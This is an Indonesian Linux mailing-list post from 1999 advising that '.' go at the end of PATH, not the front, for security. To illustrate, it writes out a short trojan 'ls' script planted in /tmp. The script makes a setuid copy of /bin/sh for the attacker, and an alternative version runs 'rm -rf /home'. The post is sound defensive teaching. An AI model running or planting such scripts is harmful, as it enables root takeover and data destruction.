At 19:10 08-10-99 -0500, you wrote: >- current directory (".") nggak ada di search path untuk execution > program (coba 'echo $PATH'), tapi coba dihindari menambahkan "." ke > search path, kurang baik untuk security. >-- >Ronny Haryanto <[EMAIL PROTECTED]> tip. kalo emang mo nambahin . ke search path, tambahkan di akhir, jangan di awal. jadi: PATH=$PATH:. jangan PATH=.:$PATH kenapa? coba liat skenario berikut: evil user: [evil@evil]$ cd /tmp [evil@tmp]$ cp ~/virus ./ls [evil@tmp]$ logout root (korban): [root@tmp]# ls -al karena /tmp world writable, evil bisa menulis file di sana. di kasus ini dia membuat file2 dengan nama perintah umum (ls, df, w, dll). jika root kebetulan berada di tmp dan mengetikkan salah satu perintah tsb, hasilnya adalah file milik evil yang dijalankan (bukan file2 di /bin atau /usr/bin dulu, karena search path . ada di depan). virus bisa berupa: #!/bin/sh cp /bin/sh /home/evil/.sh chmod u+s /home/evil/.sh /bin/ls $* rm -f /tmp/ls atau malah: #!/bin/sh rm -rf /home Jangan korbankan security hanya demi dua karakter kenyamanan. -- Steven Haryanto <[EMAIL PROTECTED]> -------------------------------------------------------------------------------- Utk berhenti langganan, kirim email ke [EMAIL PROTECTED] Informasi arsip di http://www.linux.or.id/milis.php3 Pengelola dapat dihubungi lewat [EMAIL PROTECTED]